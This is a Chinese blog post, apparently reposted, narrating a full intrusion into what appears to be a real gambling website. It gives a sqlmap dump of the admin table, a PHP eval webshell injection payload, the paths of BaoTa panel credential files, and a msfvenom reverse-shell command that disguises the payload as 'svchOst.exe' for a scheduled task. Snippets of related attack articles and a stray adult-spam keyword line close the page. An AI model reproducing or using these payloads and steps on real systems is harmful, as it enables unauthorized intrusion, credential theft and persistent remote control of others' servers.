<menu id="guoca"></menu>
<nav id="guoca"></nav><xmp id="guoca">
  • <xmp id="guoca">
  • <nav id="guoca"><code id="guoca"></code></nav>
  • <nav id="guoca"><code id="guoca"></code></nav>

    一次BC站點的GetShell過程

    VSole2023-05-22 09:33:39

    0x00 前言

    bc實戰代碼審計拿下后臺、數據庫續這篇文章作者并沒有成功GetShell,依稀記得以前遇到一個類似的站點,故打算再續前緣,最終成功拿下目標Shell權限

    0x01 獲取源碼

    首先先常規掃一波目錄:

    dirsearch -u 'http://x.x.x.x:80/' -e php
    

    并沒有發現有源碼壓縮包,故放棄這個思路,重新審視文章,獲取關鍵字,去github進行搜索,成功找到部分源碼,然后開始進行審計。


    Github:

    0x02 進入后臺

    通過之前的掃描,可以獲取到后臺登陸地址。

    訪問可以看到登陸頁面。

    沒有驗證么,果斷上一波常規的弱口令FUZZ,無果。那么只能通過源碼進行突破了,首先觀察網站的后臺鑒權邏輯主要是通過包含common/login_check.php進行判斷。

    @session_start(); //后臺登陸驗證
    if(!isset($_SESSION["adminid"])){
        unset($_SESSION["adminid"]);
        unset($_SESSION["login_pwd"]);
        unset($_SESSION["quanxian"]);
        echo "alert('login!!pass');";
        exit;
    }else{
        include_once("../../include/mysqlio.php");
    

    那么最直接的思路,就是找到一個沒有包含這個文件的地方。

    find ./ -name "*.php" |xargs grep -L "login_check.php"
    

    找到文件Get_Odds_1.php, 發現其中的$type參數直接拼接進SQL語句中,存在注入。

    正常情況:

    輸入單引號,出錯:

    SQLMAP 跑出賬號密碼,,這里雖然是GET類型的SQL注入,但是直接使用sqlmap的-u參數是不行的,需要使用Burp抓包,保存數據包然后用-r參數。

     sqlmap -r sql.txt -D dsncly -T sys_admin --dump
    

    0x03 GetShell

    進入后臺,先嘗試黑盒,看看有沒有上傳功能,不過似乎沒有找到可用的上傳點。

    黑盒沒找到很明顯的辦法了,只能進行快速代碼審計了,直接全局搜索危險函數eval、file_put_contens、fwrite、fputs等。

    可以看到這里寫入的文件是php文件,且內容可以通過ta_msg參數進行控制,也沒有過濾,只有簡單的去除兩邊的空格,這里務必要自己本地進行構造下,避免出現閉合失敗的錯誤。

    構造payload:

    ');eval($_POST[a]);var_dump(md5(1));//;
    

    最終寫入到文件gp_db.php

    成功GetShell

    0x04 寶塔提權

    通過phpinfo,可以看到disable_function,同時通過nmap掃描端口,可知目標存在寶塔。

    不過幸運的是,shell的權限還是蠻高的,可以瀏覽到寶塔的目錄。

    獲取密碼:D:/BtSoft1/panel/data/default.pl
    開放端口:D:/BtSoft1/panel/data/port.pl
    后臺地址:D:/BtSoft1/panel/data/admin_path.pl
    獲取賬號:D:/BtSoft1/panel/data/default.db
    

    通過上面步驟獲取到的賬號和密碼,登陸到后臺http://xxxx:8888/Tajl2eP0/

    登陸進去之后會彈出強制綁定窗口,可以通過直接訪問/site來繞過這個。

    下面有兩種思路進行提權:

    1) 通過軟件管理->已安裝,刪除禁用函數,來實現命令執行。

    2) 通過寶塔自帶的計劃任務。

    MSF生成木馬

    msfvenom -p windows/meterpreter/reverse_tcp  -e x86/shikata_ga_nai -i 5  LHOST=x.x.x.x LPORT=10001 EXTENSIONS=stdapi,priv  -f exe > svchOst.exe
    

    放到C盤即可,然后添加shell計劃任務

    ipconfig /all 查看網絡狀態

    簡單查看下arp -a和掃描下內網網段的存活情況,并沒有連通,故沒有繼續后續的內網滲透測試。

    0x05 總結

    本文的滲透過程比較常規,涵蓋了從0到1的完整單目標滲透過程,核心在于快速的代碼審計能力,由于這個系統開發比較凌亂,所以故不能采用框架的方式去閱讀,故采用危險函數定位是一種有效的方法,最后通過利用寶塔的信息,成功獲取到最高的權限,完成滲透測試的目標。

    sqlmapsession
    本作品采用《CC 協議》,轉載必須注明作者和本文鏈接
    一些重要的SQLMap命令
    2023-05-04 08:55:08
    從掃描SQL注入漏洞到獲取數據庫名字、表和列,以及獲得系統訪問權限,其可被用于多種目的。我們必須給SQLMap提供有效的cookie才能對登錄頁面的POST請求進行掃描。不過別總是保持一個較高的值,因為可能會影響結果的準確性。默認情況下值為1,最高可以設置為3。值為3時,就是最大值,包含了一些嚴重的SQL查詢。級別指定要執行的檢查或payload的數量。
    burp0_data = {"name": username, "pw": password, "repw": password, "email": email, "submit": ''}
    0x01 前言最近在改寫 yso,覺得自己基礎太差了,想先閱讀一下 sqlmap、冰蝎以及一些其他工具的開發思路。0x03 冰蝎的使用與流量分析冰蝎的使用我們看冰蝎的客戶端界面,對于 shell 其實是沒有輸入密碼模塊的,其實在冰蝎當中 shell 是通過傳輸協議配置的。這一傳輸協議的加密函數是用 Java 寫的,并且 key 是默認的,不需要自己修改,我們點擊生成服務端,則會生成三個 shell 文件,分別為?這種加密方式的攻防性),代碼如下,此處代碼和 v3.0 的相當不一樣。
    vulnhub之CengBox的實踐
    2023-07-17 09:23:02
    今天實踐的是vulnhub的CengBox鏡像,下載地址,https://download.vulnhub.com/cengbox/CengBox.ova,無法用workstation導入,用virtualbox導入成功,做地址掃描,sudo netdiscover -r 192.168.0.0/24,獲取到靶機地址192.168.0.185,繼續進行端口掃描,sudo nmap -sS -sV
    0x00 前言bc實戰代碼審計拿下后臺、數據庫續這篇文章作者并沒有成功GetShell,依稀記得以前遇到一個類似的站點,故打算再續前緣,最終成功拿下目標Shell權限0x01 獲取源碼首先先常規掃一波目錄:dirsearch -u 'http://x.x.x.x:80/' -e php. 并沒有發現有源碼壓縮包,故放棄這個思路,重新審視文章,獲取關鍵字,去github進行搜索,成功找到部分源碼,然后開始進行審計。Github:0x02 進入后臺通過之前的掃描,可以獲取到后臺登陸地址。訪問可以看到登陸頁面。@session_start(); //后臺登陸驗證
    一般信息查詢框會和數據庫存在交互。我輸入數字1,會正常提示木查詢到相關信息。那我們使用1’測試一下,發現不彈未查詢到相關信息的提示框,也沒有任何數據輸出,大致判斷這個點存在sql注入,并且不對輸出報錯信息。大概猜測出SQL語句為 :select * from A where id ='$_POST['id']';
    在最近的CTF比賽中,綜合靶場出現的次數越來越多,這種形式的靶場和真實的內網滲透很像,很貼合實際工作,但我們往往缺少多層網絡的練習環境。本文通過VMware搭建3層網絡,并通過msf進行內網滲透,涉及代理搭建,流量轉發,端口映射等常見內網滲透技術。
    基于Zabbix的漏洞復現
    2022-06-21 14:45:36
    STATEMENT聲明由于傳播、利用此文所提供的信息而造成的任何直接或者間接的后果及損失,均由使用者本人負責,雷神眾測及文章作者不為此承擔任何責任。雷神眾測擁有對此文章的修改和解釋權。如欲轉載或傳播此文章,必須保證此文章的完整性,包括版權聲明等全部內容。未經雷神眾測允許,不得任意修改或者增減此文章內容,不得以任何方式將其用于商業目的。
    利用這個實驗我們就可以更清晰的了解多層網絡滲透測試的過程。并了解通過msf進行內網滲透,由一級代理到二級代理的搭建來進行對三層網絡的滲透的過程。
    VSole
    網絡安全專家
      亚洲 欧美 自拍 唯美 另类